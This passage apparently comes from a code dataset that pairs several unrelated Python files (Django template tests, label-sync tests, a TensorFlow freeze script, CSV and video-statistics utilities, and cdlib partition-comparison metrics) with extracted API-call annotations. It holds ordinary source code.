}}:{{ model|safe }},{% for name, label, value, is_list in fields %}{{ name|safe }},{{ label|safe }},{% if not is_list %}{{ value|safe }}{% else %}[{% for item in value.all %}{{ item|safe }},{% endfor %}]{% endif %},{% endfor %}"""'], {}), "(\n '{{ title|default_if_none:instance|safe }}:{{ model|safe }},{% for name, label, value, is_list in fields %}{{ name|safe }},{{ label|safe }},{% if not is_list %}{{ value|safe }}{% else %}[{% for item in value.all %}{{ item|safe }},{% endfor %}]{% endif %},{% endfor %}'\n )\n", (15875, 16155), False, 'from django.template import Context, Template, TemplateSyntaxError\n'), ((18108, 18227), 'django.template.Template', 'Template', (['"""{{ title|default_if_none:model|capfirst }}{% if not title %}s{% endif %}:{{ instance_list|safe }}"""'], {}), "(\n '{{ title|default_if_none:model|capfirst }}{% if not title %}s{% endif %}:{{ instance_list|safe }}'\n )\n", (18116, 18227), False, 'from django.template import Context, Template, TemplateSyntaxError\n'), ((20384, 20473), 'django.template.Template', 'Template', (['"""{{ title|default_if_none:model|capfirst }}{% if not title %}s{% endif %}"""'], {}), "(\n '{{ title|default_if_none:model|capfirst }}{% if not title %}s{% endif %}')\n", (20392, 20473), False, 'from django.template import Context, Template, TemplateSyntaxError\n')] |
"""
Copyright 2015 Brocade Communications Systems, Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
def getpid():
_strPID = ""
if hasattr(os, 'getpid'): # only available on Unix
_strPID = os.getpid()
return _strPID
def cls():
OS = {
'posix': 'clear',
'nix': 'cls',
'nt': 'cls'
}
os.system(OS.get(os.name))
| [
"os.getpid"
] | [((704, 715), 'os.getpid', 'os.getpid', ([], {}), '()\n', (713, 715), False, 'import os\n')] |
import pytest
from labelsync.github import Github
from labelsync.helpers import HTTPError
from tests.helpers import fl, FIXTURES_PATH, create_cfg_env, get_labels
c = create_cfg_env('good.cfg')
github = Github(c, name='github', api_url='https://api.github.com/repos')
label = {
'name':'blabla',
'color':'aa11bb',
'description':'whatever'
}
label_bug = {
'name':'bug',
'color':'d73a4a',
'description':'Something isn\'t working'
}
label_new_bug = {
'name':'ERROR',
'color':'ffffff',
'description':'ERROR'
}
def test_create_label():
labels_before = get_labels('beskyfil', 'testing_repo')
num_labels_before = len(labels_before)
github.create_label('beskyfil', 'testing_repo', label)
labels_after = get_labels('beskyfil', 'testing_repo')
num_labels_after = len(labels_after)
assert num_labels_before == num_labels_after - 1
assert 'blabla' not in labels_before
assert 'blabla' in labels_after
def test_delete_label():
labels_before = get_labels('beskyfil', 'testing_repo')
num_labels_before = len(labels_before)
github.delete_label('beskyfil', 'testing_repo', label['name'])
labels_after = get_labels('beskyfil', 'testing_repo')
num_labels_after = len(labels_after)
assert num_labels_before == num_labels_after + 1
assert 'blabla' in labels_before
assert 'blabla' not in labels_after
def test_edit_label():
labels_before = get_labels('beskyfil', 'testing_repo')
num_labels_before = len(labels_before)
github.edit_label('beskyfil', 'testing_repo', label_new_bug, 'bug')
labels_after = get_labels('beskyfil', 'testing_repo')
num_labels_after = len(labels_after)
assert num_labels_before == num_labels_after
assert 'bug' in labels_before
assert 'bug' not in labels_after
assert 'ERROR' in labels_after
assert 'ERROR' not in labels_before
#revert
github.edit_label('beskyfil', 'testing_repo', label_bug, 'ERROR')
| [
"tests.helpers.get_labels",
"tests.helpers.create_cfg_env",
"labelsync.github.Github"
] | [((167, 193), 'tests.helpers.create_cfg_env', 'create_cfg_env', (['"""good.cfg"""'], {}), "('good.cfg')\n", (181, 193), False, 'from tests.helpers import fl, FIXTURES_PATH, create_cfg_env, get_labels\n'), ((203, 267), 'labelsync.github.Github', 'Github', (['c'], {'name': '"""github"""', 'api_url': '"""https://api.github.com/repos"""'}), "(c, name='github', api_url='https://api.github.com/repos')\n", (209, 267), False, 'from labelsync.github import Github\n'), ((638, 676), 'tests.helpers.get_labels', 'get_labels', (['"""beskyfil"""', '"""testing_repo"""'], {}), "('beskyfil', 'testing_repo')\n", (648, 676), False, 'from tests.helpers import fl, FIXTURES_PATH, create_cfg_env, get_labels\n'), ((800, 838), 'tests.helpers.get_labels', 'get_labels', (['"""beskyfil"""', '"""testing_repo"""'], {}), "('beskyfil', 'testing_repo')\n", (810, 838), False, 'from tests.helpers import fl, FIXTURES_PATH, create_cfg_env, get_labels\n'), ((1057, 1095), 'tests.helpers.get_labels', 'get_labels', (['"""beskyfil"""', '"""testing_repo"""'], {}), "('beskyfil', 'testing_repo')\n", (1067, 1095), False, 'from tests.helpers import fl, FIXTURES_PATH, create_cfg_env, get_labels\n'), ((1227, 1265), 'tests.helpers.get_labels', 'get_labels', (['"""beskyfil"""', '"""testing_repo"""'], {}), "('beskyfil', 'testing_repo')\n", (1237, 1265), False, 'from tests.helpers import fl, FIXTURES_PATH, create_cfg_env, get_labels\n'), ((1482, 1520), 'tests.helpers.get_labels', 'get_labels', (['"""beskyfil"""', '"""testing_repo"""'], {}), "('beskyfil', 'testing_repo')\n", (1492, 1520), False, 'from tests.helpers import fl, FIXTURES_PATH, create_cfg_env, get_labels\n'), ((1657, 1695), 'tests.helpers.get_labels', 'get_labels', (['"""beskyfil"""', '"""testing_repo"""'], {}), "('beskyfil', 'testing_repo')\n", (1667, 1695), False, 'from tests.helpers import fl, FIXTURES_PATH, create_cfg_env, get_labels\n')] |
import os
import tensorflow as tf
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('--ckpt_path', type=str)
parser.add_argument('--output_path', type=str)
args = parser.parse_args()
os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
checkpoint = args.ckpt_path
##input_checkpoint
input_checkpoint = checkpoint
##input_graph
input_meta_graph = input_checkpoint + '.meta'
##output_node_names
output_node_names='tower_0/images,tower_0/boxes,tower_0/scores,tower_0/labels,tower_0/num_detections,training_flag'
#output_graph
output_graph = os.path.join(args.output_path,'detector.pb')
print('excuted')
command="python tools/freeze.py --input_checkpoint %s --input_meta_graph %s --output_node_names %s --output_graph %s"\
%(input_checkpoint,input_meta_graph,output_node_names,output_graph)
os.system(command) | [
"os.system",
"os.path.join",
"argparse.ArgumentParser"
] | [((66, 91), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (89, 91), False, 'import argparse\n'), ((576, 621), 'os.path.join', 'os.path.join', (['args.output_path', '"""detector.pb"""'], {}), "(args.output_path, 'detector.pb')\n", (588, 621), False, 'import os\n'), ((833, 851), 'os.system', 'os.system', (['command'], {}), '(command)\n', (842, 851), False, 'import os\n')] |
import pandas as pd
from pathlib import Path
import sys
''' Concatenates all csv files in the folder passed to stdin '''
path = Path(sys.argv[1])
def get_csv_paths(path):
return [p for p in path.iterdir() if p.suffix == '.csv']
def ask_details():
print('Please specify the following:')
encoding = input('Encoding\n')
delimiter = input('Delimiter\n')
return encoding, delimiter
def get_frames(files_list, encoding, delimiter):
return [pd.read_csv(p, sep=delimiter, dtype='str', encoding=encoding) for p in csv_files]
def concat_output(frames):
output = pd.DataFrame()
for df in frames:
output = pd.concat([output,df])
path_out = path / 'COMBINED.csv'
output.to_csv(path_out, sep=';', index=False)
if __name__ == '__main__':
csv_files = get_csv_paths(path)
encoding, delimiter = ask_details()
try:
frames = get_frames(csv_files, encoding, delimiter)
concat_output(frames)
except Exception as e:
print('Seems like there were files that could not be read\n')
print(str(e))
encoding, delimiter = ask_details()
frames = get_frames(csv_files, encoding, delimiter)
concat_output(frames)
| [
"pandas.DataFrame",
"pandas.concat",
"pandas.read_csv",
"pathlib.Path"
] | [((136, 153), 'pathlib.Path', 'Path', (['sys.argv[1]'], {}), '(sys.argv[1])\n', (140, 153), False, 'from pathlib import Path\n'), ((609, 623), 'pandas.DataFrame', 'pd.DataFrame', ([], {}), '()\n', (621, 623), True, 'import pandas as pd\n'), ((483, 544), 'pandas.read_csv', 'pd.read_csv', (['p'], {'sep': 'delimiter', 'dtype': '"""str"""', 'encoding': 'encoding'}), "(p, sep=delimiter, dtype='str', encoding=encoding)\n", (494, 544), True, 'import pandas as pd\n'), ((665, 688), 'pandas.concat', 'pd.concat', (['[output, df]'], {}), '([output, df])\n', (674, 688), True, 'import pandas as pd\n')] |
import argparse, os
import lib.config as config
import lib.utils as utils
def count_present_and_missing(cls, directory, metadata):
"""
Count present and missing videos for a class based on metadata.
:param cls: The class. If None, count all videos (used for testing videos - no classes).
:param directory: Directory containing the videos.
:param metadata: Kinetics metadata json.
:return: Tuple: number present videos, number of missing videos
"""
present = 0
missing = 0
for key in metadata:
if cls is None or metadata[key]["annotations"]["label"] == cls:
if os.path.isfile(os.path.join(directory, "{}.mp4".format(key))):
present += 1
else:
missing += 1
return present, missing
def main(args):
# load video classes
classes = utils.load_json(config.CLASSES_PATH)
# load lists of videos
train_metadata = utils.load_json(config.TRAIN_METADATA_PATH)
val_metadata = utils.load_json(config.VAL_METADATA_PATH)
test_metadata = utils.load_json(config.TEST_METADATA_PATH)
num_found = 0
total = 0
total_train_present = 0
total_train_missing = 0
total_val_present = 0
total_val_missing = 0
# load subset
subset = None
if args.subset:
subset = utils.load_json(args.subset)
# count train and validation videos
for cls in classes:
if subset is not None and cls not in subset:
continue
total += 1
cls_train_path = os.path.join(config.TRAIN_ROOT, cls.replace(" ", "_"))
cls_valid_path = os.path.join(config.VALID_ROOT, cls.replace(" ", "_"))
train_found = False
valid_found = False
if os.path.isdir(cls_train_path):
train_present, train_missing = count_present_and_missing(cls, cls_train_path, train_metadata)
train_found = True
total_train_present += train_present
total_train_missing += train_missing
if os.path.isdir(cls_valid_path):
valid_present, valid_missing = count_present_and_missing(cls, cls_valid_path, val_metadata)
valid_found = True
total_val_present += valid_present
total_val_missing += valid_missing
if train_found or valid_found:
num_found += 1
if args.details:
print("class {}".format(cls))
if train_found:
print("train: {} / {}".format(train_present, train_present + train_missing))
if valid_found:
print("valid: {} / {}".format(valid_present, valid_present + valid_missing))
print()
# count test videos
test_present, test_missing = count_present_and_missing(None, config.TEST_ROOT, test_metadata)
# print
train_percent_found = 0
if total_train_present > 0:
train_percent_found = (total_train_present * 100) / (total_train_present + total_train_missing)
valid_percent_found = 0
if total_val_present > 0:
valid_percent_found = (total_val_present * 100) / (total_val_present + total_val_missing)
test_percent_found = 0
if test_present > 0:
test_percent_found = (test_present * 100) / (test_present + test_missing)
print("class stats:")
print("\t{:d} / {:d} classes found".format(num_found, total))
print()
print("video stats (only for found classes):")
print("\t{:d} / {:d} ({:.2f}%) train videos found".format(
total_train_present, total_train_present + total_train_missing, train_percent_found))
print("\t{:d} / {:d} ({:.2f}%) valid videos found".format(
total_val_present, total_val_present + total_val_missing, valid_percent_found))
print("\t{:d} / {:d} ({:.2f}%) test videos found".format(
test_present, test_present + test_missing, test_percent_found))
if __name__ == "__main__":
parser = argparse.ArgumentParser("Print statistics about downloaded videos.")
parser.add_argument("-d", "--details", action="store_true", default=False, help="detailed stats for each found class")
parser.add_argument("-s", "--subset", help="path to a JSON file containing a subset of Kinetics classes")
parsed = parser.parse_args()
main(parsed) | [
"os.path.isdir",
"lib.utils.load_json",
"argparse.ArgumentParser"
] | [((824, 860), 'lib.utils.load_json', 'utils.load_json', (['config.CLASSES_PATH'], {}), '(config.CLASSES_PATH)\n', (839, 860), True, 'import lib.utils as utils\n'), ((906, 949), 'lib.utils.load_json', 'utils.load_json', (['config.TRAIN_METADATA_PATH'], {}), '(config.TRAIN_METADATA_PATH)\n', (921, 949), True, 'import lib.utils as utils\n'), ((967, 1008), 'lib.utils.load_json', 'utils.load_json', (['config.VAL_METADATA_PATH'], {}), '(config.VAL_METADATA_PATH)\n', (982, 1008), True, 'import lib.utils as utils\n'), ((1027, 1069), 'lib.utils.load_json', 'utils.load_json', (['config.TEST_METADATA_PATH'], {}), '(config.TEST_METADATA_PATH)\n', (1042, 1069), True, 'import lib.utils as utils\n'), ((3668, 3736), 'argparse.ArgumentParser', 'argparse.ArgumentParser', (['"""Print statistics about downloaded videos."""'], {}), "('Print statistics about downloaded videos.')\n", (3691, 3736), False, 'import argparse, os\n'), ((1265, 1293), 'lib.utils.load_json', 'utils.load_json', (['args.subset'], {}), '(args.subset)\n', (1280, 1293), True, 'import lib.utils as utils\n'), ((1646, 1675), 'os.path.isdir', 'os.path.isdir', (['cls_train_path'], {}), '(cls_train_path)\n', (1659, 1675), False, 'import argparse, os\n'), ((1896, 1925), 'os.path.isdir', 'os.path.isdir', (['cls_valid_path'], {}), '(cls_valid_path)\n', (1909, 1925), False, 'import argparse, os\n')] |
import tensorflow as tf
def tanh(x):
return tf.nn.tanh(x)
| [
"tensorflow.nn.tanh"
] | [((50, 63), 'tensorflow.nn.tanh', 'tf.nn.tanh', (['x'], {}), '(x)\n', (60, 63), True, 'import tensorflow as tf\n')] |
# Generated by Django 3.0 on 2019-12-23 06:19
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('game', '0010_auto_20191223_0818'),
]
operations = [
migrations.AddField(
model_name='onlinegame',
name='playersready',
field=models.IntegerField(default=0),
),
]
| [
"django.db.models.IntegerField"
] | [((354, 384), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'default': '(0)'}), '(default=0)\n', (373, 384), False, 'from django.db import migrations, models\n')] |
import shutil
import pathlib
asset_dirs = ["artifacts/main", "artifacts/build_python_version"]
pathlib.Path("distfiles").mkdir(exist_ok=True)
for asset_dir in asset_dirs:
for fname in list(pathlib.Path(asset_dir).glob('**/RobotRaconteur-*-MATLAB*')):
print(fname)
dest = pathlib.Path(fname)
shutil.copy(str(fname),"distfiles/" + dest.name) | [
"pathlib.Path"
] | [((97, 122), 'pathlib.Path', 'pathlib.Path', (['"""distfiles"""'], {}), "('distfiles')\n", (109, 122), False, 'import pathlib\n'), ((294, 313), 'pathlib.Path', 'pathlib.Path', (['fname'], {}), '(fname)\n', (306, 313), False, 'import pathlib\n'), ((196, 219), 'pathlib.Path', 'pathlib.Path', (['asset_dir'], {}), '(asset_dir)\n', (208, 219), False, 'import pathlib\n')] |
"""Metadata for package to allow installation with pip."""
import setuptools
exec(open("closek/version.py").read())
with open("README.md", "r") as fh:
long_description = fh.read()
setuptools.setup(
name="closek",
description="Scikit-learn-style implementation of the close-k classifier.",
long_description=long_description,
long_description_content_type="text/markdown",
author="<NAME>",
author_email="<EMAIL>",
url="https://github.com/bryan-he/close-k",
version=__version__,
packages=setuptools.find_packages(),
install_requires=[
"torch",
"numpy",
"sklearn",
],
tests_require=[
"pmlb",
],
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
]
)
| [
"setuptools.find_packages"
] | [((529, 555), 'setuptools.find_packages', 'setuptools.find_packages', ([], {}), '()\n', (553, 555), False, 'import setuptools\n')] |
import numpy as np
from cdlib.evaluation.internal import onmi
from cdlib.evaluation.internal.omega import Omega
from nf1 import NF1
from collections import namedtuple, defaultdict
__all__ = [
"MatchingResult",
"normalized_mutual_information",
"overlapping_normalized_mutual_information_LFK",
"overlapping_normalized_mutual_information_MGH",
"omega",
"f1",
"nf1",
"adjusted_rand_index",
"adjusted_mutual_information",
"variation_of_information",
"partition_closeness_simple",
]
# MatchingResult = namedtuple("MatchingResult", ['mean', 'std'])
MatchingResult = namedtuple("MatchingResult", "score std")
MatchingResult.__new__.__defaults__ = (None,) * len(MatchingResult._fields)
def __check_partition_coverage(first_partition: object, second_partition: object):
nodes_first = {
node: None for community in first_partition.communities for node in community
}
nodes_second = {
node: None for community in second_partition.communities for node in community
}
if len(set(nodes_first.keys()) ^ set(nodes_second.keys())) != 0:
raise ValueError("Both partitions should cover the same node set")
def __check_partition_overlap(first_partition: object, second_partition: object):
if first_partition.overlap or second_partition.overlap:
raise ValueError("Not defined for overlapping partitions")
def normalized_mutual_information(
first_partition: object, second_partition: object
) -> MatchingResult:
"""
Normalized Mutual Information between two clusterings.
Normalized Mutual Information (NMI) is an normalization of the Mutual
Information (MI) score to scale the results between 0 (no mutual
information) and 1 (perfect correlation). In this function, mutual
information is normalized by ``sqrt(H(labels_true) * H(labels_pred))``
:param first_partition: NodeClustering object
:param second_partition: NodeClustering object
:return: MatchingResult object
:Example:
>>> from cdlib import evaluation, algorithms
>>> g = nx.karate_club_graph()
>>> louvain_communities = algorithms.louvain(g)
>>> leiden_communities = algorithms.leiden(g)
>>> evaluation.normalized_mutual_information(louvain_communities,leiden_communities)
"""
__check_partition_coverage(first_partition, second_partition)
__check_partition_overlap(first_partition, second_partition)
first_partition_c = [
x[1]
for x in sorted(
[
(node, nid)
for nid, cluster in enumerate(first_partition.communities)
for node in cluster
],
key=lambda x: x[0],
)
]
second_partition_c = [
x[1]
for x in sorted(
[
(node, nid)
for nid, cluster in enumerate(second_partition.communities)
for node in cluster
],
key=lambda x: x[0],
)
]
from sklearn.metrics import normalized_mutual_info_score
return MatchingResult(
score=normalized_mutual_info_score(first_partition_c, second_partition_c)
)
def overlapping_normalized_mutual_information_LFK(
first_partition: object, second_partition: object
) -> MatchingResult:
"""
Overlapping Normalized Mutual Information between two clusterings.
Extension of the Normalized Mutual Information (NMI) score to cope with overlapping partitions.
This is the version proposed by Lancichinetti et al. (1)
:param first_partition: NodeClustering object
:param second_partition: NodeClustering object
:return: MatchingResult object
:Example:
>>> from cdlib import evaluation, algorithms
>>> g = nx.karate_club_graph()
>>> louvain_communities = algorithms.louvain(g)
>>> leiden_communities = algorithms.leiden(g)
>>> evaluation.overlapping_normalized_mutual_information_LFK(louvain_communities,leiden_communities)
:Reference:
1. <NAME>., <NAME>., & <NAME>. (2009). Detecting the overlapping and hierarchical community structure in complex networks. New Journal of Physics, 11(3), 033015.
"""
return MatchingResult(
score=onmi.onmi(
[set(x) for x in first_partition.communities],
[set(x) for x in second_partition.communities],
)
)
def overlapping_normalized_mutual_information_MGH(
first_partition: object, second_partition: object, normalization: str = "max"
) -> MatchingResult:
"""
Overlapping Normalized Mutual Information between two clusterings.
Extension of the Normalized Mutual Information (NMI) score to cope with overlapping partitions.
This is the version proposed by McDaid et al. using a different normalization than the original LFR one. See ref.
for more details.
:param first_partition: NodeClustering object
:param second_partition: NodeClustering object
:param normalization: one of "max" or "LFK". Default "max" (corresponds to the main method described in the article)
:return: MatchingResult object
:Example:
>>> from cdlib import evaluation, algorithms
>>> g = nx.karate_club_graph()
>>> louvain_communities = algorithms.louvain(g)
>>> leiden_communities = algorithms.leiden(g)
>>> evaluation.overlapping_normalized_mutual_information_MGH(louvain_communities,leiden_communities)
:Reference:
1. <NAME>., <NAME>., & <NAME>. (2011). Normalized mutual information to evaluate overlapping community finding algorithms. arXiv preprint arXiv:1110.2515. Chicago
"""
if normalization == "max":
variant = "MGH"
elif normalization == "LFK":
variant = "MGH_LFK"
else:
raise ValueError(
"Wrong 'normalization' value. Please specify one among [max, LFK]."
)
return MatchingResult(
score=onmi.onmi(
[set(x) for x in first_partition.communities],
[set(x) for x in second_partition.communities],
variant=variant,
)
)
def omega(first_partition: object, second_partition: object) -> MatchingResult:
"""
Index of resemblance for overlapping, complete coverage, network clusterings.
:param first_partition: NodeClustering object
:param second_partition: NodeClustering object
:return: MatchingResult object
:Example:
>>> from cdlib import evaluation, algorithms
>>> g = nx.karate_club_graph()
>>> louvain_communities = algorithms.louvain(g)
>>> leiden_communities = algorithms.leiden(g)
>>> evaluation.omega(louvain_communities,leiden_communities)
:Reference:
1. <NAME>, <NAME>, and <NAME>. 2012. `Using the omega index for evaluating abstractive algorithms detection. <https://pdfs.semanticscholar.org/59d6/5d5aa09d789408fd9fd3c009a1b070ff5859.pdf/>`_ In Proceedings of Workshop on Evaluation Metrics and System Comparison for Automatic Summarization. Association for Computational Linguistics, Stroudsburg, PA, USA, 10-18.
"""
__check_partition_coverage(first_partition, second_partition)
first_partition = {k: v for k, v in enumerate(first_partition.communities)}
second_partition = {k: v for k, v in enumerate(second_partition.communities)}
om_idx = Omega(first_partition, second_partition)
return MatchingResult(score=om_idx.omega_score)
def f1(first_partition: object, second_partition: object) -> MatchingResult:
"""
Compute the average F1 score of the optimal algorithms matches among the partitions in input.
Works on overlapping/non-overlapping complete/partial coverage partitions.
:param first_partition: NodeClustering object
:param second_partition: NodeClustering object
:return: MatchingResult object
:Example:
>>> from cdlib import evaluation, algorithms
>>> g = nx.karate_club_graph()
>>> louvain_communities = algorithms.louvain(g)
>>> leiden_communities = algorithms.leiden(g)
>>> evaluation.f1(louvain_communities,leiden_communities)
:Reference:
1. <NAME>., <NAME>., & <NAME>. (2016). `A novel approach to evaluate algorithms detection internal on ground truth. <https://www.researchgate.net/publication/287204505_A_novel_approach_to_evaluate_community_detection_algorithms_on_ground_truth/>`_ In Complex Networks VII (pp. 133-144). Springer, Cham.
"""
nf = NF1(first_partition.communities, second_partition.communities)
results = nf.summary()
return MatchingResult(
score=results["details"]["F1 mean"][0], std=results["details"]["F1 std"][0]
)
def nf1(first_partition: object, second_partition: object) -> MatchingResult:
"""
Compute the Normalized F1 score of the optimal algorithms matches among the partitions in input.
Works on overlapping/non-overlapping complete/partial coverage partitions.
:param first_partition: NodeClustering object
:param second_partition: NodeClustering object
:return: MatchingResult object
:Example:
>>> from cdlib import evaluation, algorithms
>>> g = nx.karate_club_graph()
>>> louvain_communities = algorithms.louvain(g)
>>> leiden_communities = algorithms.leiden(g)
>>> evaluation.nf1(louvain_communities,leiden_communities)
:Reference:
1. <NAME>., <NAME>., & <NAME>. (2016). `A novel approach to evaluate algorithms detection internal on ground truth. <https://www.researchgate.net/publication/287204505_A_novel_approach_to_evaluate_community_detection_algorithms_on_ground_truth/>`_
2. <NAME>. (2017). : `RDyn: graph benchmark handling algorithms dynamics. Journal of Complex Networks. <https://academic.oup.com/comnet/article-abstract/5/6/893/3925036?redirectedFrom=PDF/>`_ 5(6), 893-912.
"""
nf = NF1(first_partition.communities, second_partition.communities)
results = nf.summary()
return MatchingResult(score=results["scores"].loc["NF1"][0])
def adjusted_rand_index(
first_partition: object, second_partition: object
) -> MatchingResult:
"""Rand index adjusted for chance.
The Rand Index computes a similarity measure between two clusterings
by considering all pairs of samples and counting pairs that are
assigned in the same or different clusters in the predicted and
true clusterings.
The raw RI score is then "adjusted for chance" into the ARI score
using the following scheme::
ARI = (RI - Expected_RI) / (max(RI) - Expected_RI)
The adjusted Rand index is thus ensured to have a value close to
0.0 for random labeling independently of the number of clusters and
samples and exactly 1.0 when the clusterings are identical (up to
a permutation).
ARI is a symmetric measure::
adjusted_rand_index(a, b) == adjusted_rand_index(b, a)
:param first_partition: NodeClustering object
:param second_partition: NodeClustering object
:return: MatchingResult object
:Example:
>>> from cdlib import evaluation, algorithms
>>> g = nx.karate_club_graph()
>>> louvain_communities = algorithms.louvain(g)
>>> leiden_communities = algorithms.leiden(g)
>>> evaluation.adjusted_rand_index(louvain_communities,leiden_communities)
:Reference:
1. <NAME>., & <NAME>. (1985). `Comparing partitions. <https://link.springer.com/article/10.1007/BF01908075/>`_ Journal of classification, 2(1), 193-218.
"""
__check_partition_coverage(first_partition, second_partition)
__check_partition_overlap(first_partition, second_partition)
first_partition_c = [
x[1]
for x in sorted(
[
(node, nid)
for nid, cluster in enumerate(first_partition.communities)
for node in cluster
],
key=lambda x: x[0],
)
]
second_partition_c = [
x[1]
for x in sorted(
[
(node, nid)
for nid, cluster in enumerate(second_partition.communities)
for node in cluster
],
key=lambda x: x[0],
)
]
from sklearn.metrics import adjusted_rand_score
return MatchingResult(
score=adjusted_rand_score(first_partition_c, second_partition_c)
)
def adjusted_mutual_information(
first_partition: object, second_partition: object
) -> MatchingResult:
"""Adjusted Mutual Information between two clusterings.
Adjusted Mutual Information (AMI) is an adjustment of the Mutual
Information (MI) score to account for chance. It accounts for the fact that
the MI is generally higher for two clusterings with a larger number of
clusters, regardless of whether there is actually more information shared.
For two clusterings :math:`U` and :math:`V`, the AMI is given as::
AMI(U, V) = [MI(U, V) - E(MI(U, V))] / [max(H(U), H(V)) - E(MI(U, V))]
This metric is independent of the absolute values of the labels:
a permutation of the class or cluster label values won't change the
score value in any way.
This metric is furthermore symmetric: switching ``label_true`` with
``label_pred`` will return the same score value. This can be useful to
measure the agreement of two independent label assignments strategies
on the same dataset when the real ground truth is not known.
Be mindful that this function is an order of magnitude slower than other
metrics, such as the Adjusted Rand Index.
:param first_partition: NodeClustering object
:param second_partition: NodeClustering object
:return: MatchingResult object
:Example:
>>> from cdlib import evaluation, algorithms
>>> g = nx.karate_club_graph()
>>> louvain_communities = algorithms.louvain(g)
>>> leiden_communities = algorithms.leiden(g)
>>> evaluation.adjusted_mutual_information(louvain_communities,leiden_communities)
:Reference:
1. <NAME>., <NAME>., & <NAME>. (2010). `Information theoretic measures for clusterings comparison: Variants, properties, normalization and correction for chance. <http://jmlr.csail.mit.edu/papers/volume11/vinh10a/vinh10a.pdf/>`_ Journal of Machine Learning Research, 11(Oct), 2837-2854.
"""
__check_partition_coverage(first_partition, second_partition)
__check_partition_overlap(first_partition, second_partition)
first_partition_c = [
x[1]
for x in sorted(
[
(node, nid)
for nid, cluster in enumerate(first_partition.communities)
for node in cluster
],
key=lambda x: x[0],
)
]
second_partition_c = [
x[1]
for x in sorted(
[
(node, nid)
for nid, cluster in enumerate(second_partition.communities)
for node in cluster
],
key=lambda x: x[0],
)
]
from sklearn.metrics import adjusted_mutual_info_score
return MatchingResult(
score=adjusted_mutual_info_score(first_partition_c, second_partition_c)
)
def variation_of_information(
first_partition: object, second_partition: object
) -> MatchingResult:
"""Variation of Information among two nodes partitions.
$$ H(p)+H(q)-2MI(p, q) $$
where MI is the mutual information, H the partition entropy and p,q are the algorithms sets
:param first_partition: NodeClustering object
:param second_partition: NodeClustering object
:return: MatchingResult object
:Example:
>>> from cdlib import evaluation, algorithms
>>> g = nx.karate_club_graph()
>>> louvain_communities = algorithms.louvain(g)
>>> leiden_communities = algorithms.leiden(g)
>>> evaluation.variation_of_information(louvain_communities,leiden_communities)
:Reference:
1. Meila, M. (2007). `Comparing clusterings - an information based distance. <https://www.sciencedirect.com/science/article/pii/S0047259X06002016/>`_ Journal of Multivariate Analysis, 98, 873-895. doi:10.1016/j.jmva.2006.11.013
"""
__check_partition_coverage(first_partition, second_partition)
__check_partition_overlap(first_partition, second_partition)
n = float(sum([len(c1) for c1 in first_partition.communities]))
sigma = 0.0
for c1 in first_partition.communities:
p = len(c1) / n
for c2 in second_partition.communities:
q = len(c2) / n
r = len(set(c1) & set(c2)) / n
if r > 0.0:
sigma += r * (np.log2(r / p) + np.log2(r / q))
return MatchingResult(score=abs(sigma))
def partition_closeness_simple(
first_partition: object, second_partition: object
) -> MatchingResult:
"""Community size density closeness.
Simple implementation that does not leverage kernel density estimator.
$$ S_G(A,B) = \frac{1}{2} \Sum_{i=1}^{r}\Sum_{j=1}^{s} min(\frac{n^a(x^a_i)}{N^a}, \frac{n^b_j(x^b_j)}{N^b}) \delta(x_i^a,x_j^b) $$
where:
$$ N^a $$ total number of communities in A of any size;
$$ x^a $$ ordered list of community sizes for A;
$$ n^a $$ multiplicity of community sizes for A.
(symmetrically for B)
:param first_partition: NodeClustering object
:param second_partition: NodeClustering object
:return: MatchingResult object
:Example:
>>> from cdlib import evaluation, algorithms
>>> g = nx.karate_club_graph()
>>> louvain_communities = algorithms.louvain(g)
>>> leiden_communities = algorithms.leiden(g)
>>> evaluation.partition_closeness_simple(louvain_communities,leiden_communities)
:Reference:
1. Dao, Vinh-Loc, <NAME>, and <NAME>. "Estimating the similarity of community detection methods based on cluster size distribution." International Conference on Complex Networks and their Applications. Springer, Cham, 2018.
"""
coms_a = sorted(list(set([len(c) for c in first_partition.communities])))
freq_a = defaultdict(int)
for a in coms_a:
freq_a[a] += 1
freq_a = [freq_a[a] for a in sorted(freq_a)]
n_a = sum([coms_a[i] * freq_a[i] for i in range(0, len(coms_a))])
coms_b = sorted(list(set([len(c) for c in second_partition.communities])))
freq_b = defaultdict(int)
for b in coms_b:
freq_b[b] += 1
freq_b = [freq_b[b] for b in sorted(freq_b)]
n_b = sum([coms_b[i] * freq_b[i] for i in range(0, len(coms_b))])
closeness = 0
for i in range(0, len(coms_a)):
for j in range(0, len(coms_b)):
if coms_a[i] == coms_b[j]:
closeness += min(
(coms_a[i] * freq_a[i]) / n_a, (coms_b[j] * freq_b[j]) / n_b
)
closeness *= 0.5
return MatchingResult(score=closeness)
| [
"cdlib.evaluation.internal.omega.Omega",
"collections.namedtuple",
"sklearn.metrics.adjusted_mutual_info_score",
"numpy.log2",
"sklearn.metrics.adjusted_rand_score",
"collections.defaultdict",
"sklearn.metrics.normalized_mutual_info_score",
"nf1.NF1"
] | [((606, 647), 'collections.namedtuple', 'namedtuple', (['"""MatchingResult"""', '"""score std"""'], {}), "('MatchingResult', 'score std')\n", (616, 647), False, 'from collections import namedtuple, defaultdict\n'), ((7282, 7322), 'cdlib.evaluation.internal.omega.Omega', 'Omega', (['first_partition', 'second_partition'], {}), '(first_partition, second_partition)\n', (7287, 7322), False, 'from cdlib.evaluation.internal.omega import Omega\n'), ((8383, 8445), 'nf1.NF1', 'NF1', (['first_partition.communities', 'second_partition.communities'], {}), '(first_partition.communities, second_partition.communities)\n', (8386, 8445), False, 'from nf1 import NF1\n'), ((9760, 9822), 'nf1.NF1', 'NF1', (['first_partition.communities', 'second_partition.communities'], {}), '(first_partition.communities, second_partition.communities)\n', (9763, 9822), False, 'from nf1 import NF1\n'), ((17907, 17923), 'collections.defaultdict', 'defaultdict', (['int'], {}), '(int)\n', (17918, 17923), False, 'from collections import namedtuple, defaultdict\n'), ((18180, 18196), 'collections.defaultdict', 'defaultdict', (['int'], {}), 